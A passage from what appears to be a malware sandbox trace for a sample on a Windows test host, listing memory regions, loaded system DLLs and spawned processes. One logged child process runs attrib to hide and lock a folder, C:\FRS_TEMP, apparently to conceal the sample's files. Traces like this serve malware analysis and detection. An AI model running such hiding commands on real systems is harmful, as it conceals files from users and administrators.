0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 1232 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 1233 start_va = 0xd10000 end_va = 0xd1efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 1234 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 1235 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 1236 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 1237 start_va = 0xdb0000 end_va = 0xdb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 1238 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1239 start_va = 0xe40000 end_va = 0xe47fff entry_point = 0xe40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\SysWOW64\\attrib.exe" (normalized: "c:\\windows\\syswow64\\attrib.exe") Region: id = 1240 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1241 start_va = 0x7f670000 end_va = 0x7f692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Region: id = 1242 start_va = 0x7f69b000 end_va = 0x7f69bfff entry_point = 0x0 region_type = private name = "private_0x000000007f69b000" filename = "" Region: id = 1243 start_va = 0x7f69c000 end_va = 0x7f69efff entry_point = 0x0 region_type = private name = "private_0x000000007f69c000" filename = "" Region: id = 1244 start_va = 0x7f69f000 end_va = 0x7f69ffff entry_point = 0x0 region_type = private name = "private_0x000000007f69f000" filename = "" Region: id = 1245 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1246 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1247 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1248 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1249 start_va = 0xf30000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1250 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1251 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1252 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1253 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 1254 start_va = 0xe50000 end_va = 0xecdfff entry_point = 0xe50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1255 start_va = 0xfd0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1256 start_va = 0x747f0000 end_va = 0x74810fff entry_point = 0x747f0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 1257 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1258 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1259 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1260 start_va = 0x7f570000 end_va = 0x7f66ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Thread: id = 34 os_tid = 0x5f8 Process: id = "33" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x1330d000" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "attrib +s +a +h +r C:\\FRS_TEMP" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1261 start_va = 0xe40000 end_va = 0xe47fff entry_point = 0xe40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\SysWOW64\\attrib.exe" (normalized: "c:\\windows\\syswow64\\attrib.exe") Region: id = 1262 start_va = 0xff0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 1263 start_va = 0x1010000 end_va = 0x1011fff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 1264 start_va = 0x1020000 end_va = 0x102efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 1265 start_va = 0x1030000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1266 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1267 start_va = 0x10b0000 end_va = 0x10b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010b0000" filename = "" Region: id = 1268 start_va = 0x10c0000 end_va = 0x10c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 1269 start_va = 0x10d0000 end_va = 0x10d1fff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1270 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1271 start_va = 0x7eb40000 end_va = 0x7eb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 1272 start_va = 0x7eb64000 end_va = 0x7eb64fff entry_point = 0x0 region_type = private name = "private_0x000000007eb64000" filename = "" Region: id = 1273 start_va = 0x7eb6c000 end_va = 0x7eb6cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb6c000" filename = "" Region: id = 1274 start_va = 0x7eb6d000 end_va = 0x7eb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb6d000" filename = "" Region: id = 1275 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1276 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1277 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1278 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1279 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 1280 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1281 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1282 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 35 os_tid = 0xbf4 Process: id = "34" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0xc6f2000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}" cur_dir = "C:\\Windows\\system32\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1356 start_va = 0xf00000 end_va = 0xf0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 1357 start_va = 0xf10000 end_va = 0xf13fff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1358 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 1359 start_va = 0xf30000 end_va = 0xf3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 1360 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1361 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1362 start_va = 0xfc0000 end_va = 0xfc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 1363 start_va = 0xfd0000 end_va = 0xfd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1364 start_va = 0xfe0000 end_va = 0x105dfff entry_point = 0xfe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1365 start_va = 0x1060000 end_va = 0x1065fff entry_point = 0x1060000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 1366 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 1367 start_va = 0x1080000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1368 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 1369 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1370 start_va = 0x1110000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 1371 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1372 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 1373 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1374 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1375 start_va = 0x12b0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1376 start_va = 0x12f0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 1377 start_va = 0x1330000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 1378 start_va = 0x1370000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 1379 start_va = 0x13b0000 end_va = 0x13b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 1380 start_va = 0x13c0000 end_va = 0x13c3fff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 1381 start_va = 0x13d0000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1382 start_va = 0x1410000 end_va = 0x1411fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001410000" filename = "" Region: id = 1383 start_va = 0x1420000 end_va = 0x1420fff entry_point = 0x1420000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1384 start_va = 0x1430000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 1385 start_va = 0x1440000 end_va = 0x1714fff entry_point = 0x1440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1386 start_va = 0x1720000 end_va = 0x18a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001720000" filename = "" Region: id = 1387 start_va = 0x18b0000 end_va = 0x1a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018b0000" filename = "" Region: id = 1388 start_va = 0x1a40000 end_va = 0x2e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a40000" filename = "" Region: id = 1389 start_va = 0x2e40000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 1390 start_va = 0x2e80000 end_va = 0x2e83fff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 1391 start_va = 0x2ea0000 end_va = 0x2ea1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ea0000" filename = "" Region: id = 1392 start_va = 0x2ec0000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1393 start_va = 0x2ed0000 end_va = 0x2fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ed0000" filename = "" Region: id = 1394 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1395 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1396 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1397 start_va = 0x73f90000 end_va = 0x73f9cfff entry_point = 0x73f90000 region_type = mapped_file name = "photobase.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll") Region: id = 1398 start_va = 0x73fa0000 end_va = 0x73fe7fff entry_point = 0x73fa0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 1399 start_va = 0x73ff0000 end_va = 0x7413cfff entry_point = 0x73ff0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1400 start_va = 0x74140000 end_va = 0x742f7fff entry_point = 0x74140000 region_type = mapped_file name = "d3d9.dll" filename = "\\Windows\\SysWOW64\\d3d9.dll" (normalized: "c:\\windows\\syswow64\\d3d9.dll") Region: id = 1401 start_va = 0x74300000 end_va = 0x7430dfff entry_point = 0x74300000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1402 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1403 start_va = 0x74320000 end_va = 0x744a9fff entry_point = 0x74320000 region_type = mapped_file name = "photoviewer.dll" filename = "\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll") Region: id = 1404 start_va = 0x744c0000 end_va = 0x745e2fff entry_point = 0x744c0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1405 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1406 start_va = 0x74600000 end_va = 0x747e5fff entry_point = 0x74600000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll") Region: id = 1407 start_va = 0x74830000 end_va = 0x748a5fff entry_point = 0x74830000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1408 start_va = 0x748c0000 end_va = 0x748d7fff entry_point = 0x748c0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1409 start_va = 0x748e0000 end_va = 0x749bafff entry_point = 0x748e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1410 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1411 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1412 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1413 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1414 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1415 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1416 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1417 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1418 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1419 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1420 start_va = 0x755b0000 end_va = 0x756fcfff entry_point = 0x755b0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\SysWOW64\\GdiPlus.dll" (normalized: "c:\\windows\\syswow64\\gdiplus.dll") Region: id = 1421 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1422 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1423 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1424 start_va = 0x75a50000 end_va = 0x76bfcfff entry_point = 0x75a50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1425 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1426 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1427 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1428 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1429 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1430 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1431 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1432 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1433 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1434 start_va = 0x7ecf7000 end_va = 0x7ecf9fff entry_point = 0x0 region_type = private name = "private_0x000000007ecf7000" filename = "" Region: id = 1435 start_va = 0x7ecfa000 end_va = 0x7ecfcfff entry_point = 0x0 region_type = private name = "private_0x000000007ecfa000" filename = "" Region: id = 1436 start_va = 0x7ecfd000 end_va = 0x7ecfffff entry_point = 0x0 region_type = private name = "private_0x000000007ecfd000" filename = "" Region: id = 1437 start_va = 0x7ed00000 end_va = 0x7edfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed00000" filename = "" Region: id = 1438 start_va = 0x7ee00000 end_va = 0x7ee22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee00000" filename = "" Region: id = 1439 start_va = 0x7ee24000 end_va = 0x7ee24fff entry_point = 0x0 region_type = private name = "private_0x000000007ee24000" filename = "" Region: id = 1440 start_va = 0x7ee25000 end_va = 0x7ee27fff entry_point = 0x0 region_type = private name = "private_0x000000007ee25000" filename = "" Region: id = 1441 start_va = 0x7ee28000 end_va = 0x7ee2afff entry_point = 0x0 region_type = private name = "private_0x000000007ee28000" filename = "" Region: id = 1442 start_va = 0x7ee2b000 end_va = 0x7ee2bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee2b000" filename = "" Region: id = 1443 start_va = 0x7ee2d000 end_va = 0x7ee2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee2d000" filename = "" Region: id = 1444 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1445 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1446 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1447 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1452 start_va = 0x73e20000 end_va = 0x73f1ffff entry_point = 0x73e20000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 1453 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e90000" filename = "" Region: id = 1454 start_va = 0x2fd0000 end_va = 0x304ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 1455 start_va = 0x3050000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 1456 start_va = 0x3090000 end_va = 0x30cffff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1457 start_va = 0x744b0000 end_va = 0x744bdfff entry_point = 0x744b0000 region_type = mapped_file name = "profapi.dll" filename = 